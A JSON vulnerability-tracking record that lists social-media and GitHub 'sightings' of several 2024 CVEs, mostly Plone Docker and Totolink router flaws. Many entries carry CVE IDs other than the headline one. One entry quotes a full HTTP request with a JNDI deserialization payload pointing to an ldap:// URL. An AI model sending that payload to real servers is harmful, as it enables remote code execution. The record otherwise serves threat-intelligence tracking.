{"vulnerability": "CVE-2024-2305", "sightings": [{"uuid": "68a55044-b168-4579-afa1-ef9db03a6289", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23055", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-23055.yaml", "content": "", "creation_timestamp": "2026-01-20T07:32:18.000000Z"}, {"uuid": "feacab1a-3e22-448d-8714-91125db63fc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23055", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3mcxkzurpx32i", "content": "", "creation_timestamp": "2026-01-21T21:03:01.986594Z"}, {"uuid": "c3838734-879e-4fd2-8abd-0be552948dd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2305", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3559", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2305\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2024-04-09T19:15:31.153\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://plugins.trac.wordpress.org/changeset?old_path=/bb-bootstrap-cards/tags/1.1.2&amp;old=3056277&amp;new_path=/bb-bootstrap-cards/tags/1.1.3&amp;new=3056277&amp;sfp_email=&amp;sfph_mail=\n2. https://www.wordfence.com/threat-intel/vulnerabilities/id/ac0dfaac-cce6-45f7-ad5b-d7dcb66453bd?source=cve\n3. https://plugins.trac.wordpress.org/changeset?old_path=/bb-bootstrap-cards/tags/1.1.2&amp;old=3056277&amp;new_path=/bb-bootstrap-cards/tags/1.1.3&amp;new=3056277&amp;sfp_email=&amp;sfph_mail=\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/ac0dfaac-cce6-45f7-ad5b-d7dcb66453bd?source=cve", "creation_timestamp": "2025-01-31T03:22:04.000000Z"}, {"uuid": "777d9bd8-b6c2-4700-a256-86160c440791", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23055", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18607", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-23055\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers.\n\ud83d\udccf Published: 2024-01-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-06-17T14:19:33.191Z\n\ud83d\udd17 References:\n1. http://plone.com\n2. http://ploneorg.com\n3. https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-23055", "creation_timestamp": "2025-06-17T14:40:18.000000Z"}, {"uuid": "4f668b44-95c7-4775-8fb4-ab2a20565c27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23054", "type": "seen", "source": "https://t.me/ctinow/184205", "content": "https://ift.tt/gWX5StF\nCVE-2024-23054 Exploit", "creation_timestamp": "2024-02-13T21:16:56.000000Z"}, {"uuid": "4f56c9ad-6ccb-4881-8f26-b407e693725d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23059", "type": "seen", "source": "https://t.me/ctinow/176003", "content": "https://ift.tt/QDOz805\nCVE-2024-23059 | Totolink A3300R 17.0.0cu.557_B20221024 setDdnsCfg username command injection", "creation_timestamp": "2024-01-30T15:51:53.000000Z"}, {"uuid": "c054ac80-5e1e-4212-9bfd-f97672fb7de7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23057", "type": "seen", "source": "https://t.me/ctinow/176001", "content": "https://ift.tt/i7gxP6j\nCVE-2024-23057 | Totolink A3300R 17.0.0cu.557_B20221024 setNtpCfg tz command injection", "creation_timestamp": "2024-01-30T15:51:51.000000Z"}, {"uuid": "334eaf76-eaef-4e78-bf58-57ba4a2c7f1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23058", "type": "seen", "source": "https://t.me/ctinow/176002", "content": "https://ift.tt/E6VHfO8\nCVE-2024-23058 | Totolink A3300R 17.0.0cu.557_B20221024 setTr069Cfg pass command injection", "creation_timestamp": "2024-01-30T15:51:52.000000Z"}, {"uuid": "26220900-fad0-48e9-9757-3cfb1369d728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23059", "type": "seen", "source": "https://t.me/ctinow/169879", "content": "https://ift.tt/RX56hHp\nCVE-2024-23059 Exploit", "creation_timestamp": "2024-01-18T19:16:53.000000Z"}, {"uuid": "b601e56a-231c-4712-9b74-8c2708d1ce9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23057", "type": "seen", "source": "https://t.me/ctinow/169877", "content": "https://ift.tt/Lt5d8p7\nCVE-2024-23057 Exploit", "creation_timestamp": "2024-01-18T19:16:47.000000Z"}, {"uuid": "681a05ee-37c2-4857-adef-bdcd750f94f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23058", "type": "seen", "source": "https://t.me/ctinow/169876", "content": "https://ift.tt/nt3upAy\nCVE-2024-23058 Exploit", "creation_timestamp": "2024-01-18T19:16:44.000000Z"}, {"uuid": "866dc2aa-6721-4766-af2e-250744e5be68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23052", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2652", "content": "CVE-2024-23052\n\nPOST /CrmCustomer/queryPageList HTTP/1.1\nHost: 127.0.0.1\nContent-Length: 93\n\n{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"ldap://utl\"}\"\n\n#poc  #exploit", "creation_timestamp": "2024-06-12T14:07:17.000000Z"}, {"uuid": "14e5ef40-f241-4a75-915d-5139d03260e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23054", "type": "seen", "source": "https://t.me/ctinow/179352", "content": "https://ift.tt/KwPCy10\nCVE-2024-23054", "creation_timestamp": "2024-02-05T17:22:24.000000Z"}, {"uuid": "71567ab5-c60e-463b-ae30-0bf51ce4b4b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23055", "type": "seen", "source": "https://t.me/ctinow/173872", "content": "https://ift.tt/tP9QAjO\nCVE-2024-23055", "creation_timestamp": "2024-01-25T23:26:55.000000Z"}, {"uuid": "be7dc8cf-83e1-49d2-8a25-deee17d39e9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23059", "type": "seen", "source": "https://t.me/ctinow/166691", "content": "https://ift.tt/m1wgO4u\nCVE-2024-23059", "creation_timestamp": "2024-01-11T18:02:41.000000Z"}, {"uuid": "edf385c6-63ed-4276-a98f-6fe226e983ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23058", "type": "seen", "source": "https://t.me/ctinow/166690", "content": "https://ift.tt/jW7fIgA\nCVE-2024-23058", "creation_timestamp": "2024-01-11T18:02:39.000000Z"}, {"uuid": "3a934d1e-c355-4da1-ad24-2616f8df6412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23057", "type": "seen", "source": "https://t.me/ctinow/166689", "content": "https://ift.tt/sFgfRKy\nCVE-2024-23057", "creation_timestamp": "2024-01-11T18:02:38.000000Z"}, {"uuid": "761dbeba-9d95-44ba-8ad4-e43731ec1326", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23054", "type": "seen", "source": "https://t.me/ctinow/196403", "content": "https://ift.tt/flUJCDk\nCVE-2024-23054 | Plone Docker Official Image 5.2.13 uncontrolled search path", "creation_timestamp": "2024-02-29T09:27:14.000000Z"}, {"uuid": "91b817da-eaa8-4612-82cc-bf7f2acdade0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23052", "type": "seen", "source": "https://t.me/ctinow/196125", "content": "https://ift.tt/4kFnAjd\nCVE-2024-23052", "creation_timestamp": "2024-02-29T03:02:53.000000Z"}, {"uuid": "43f02f12-e80f-4798-93fd-5648b63815a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23052", "type": "seen", "source": "https://t.me/ctinow/196108", "content": "https://ift.tt/4kFnAjd\nCVE-2024-23052", "creation_timestamp": "2024-02-29T02:56:21.000000Z"}, {"uuid": "850afd0e-8f93-4a98-a5f5-7cbaf618b8e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23055", "type": "seen", "source": "https://t.me/ctinow/187346", "content": "https://ift.tt/OF6iEyD\nCVE-2024-23055 | Plone Docker Official Image 5.2.13 Header Host Privilege Escalation", "creation_timestamp": "2024-02-18T19:46:11.000000Z"}, {"uuid": "e3e7bd91-2dba-4858-b5a6-da29cc9b1493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23055", "type": "seen", "source": "https://t.me/ctinow/178273", "content": "https://ift.tt/WzDaHQi\nCVE-2024-23055 Exploit", "creation_timestamp": "2024-02-02T21:16:45.000000Z"}]}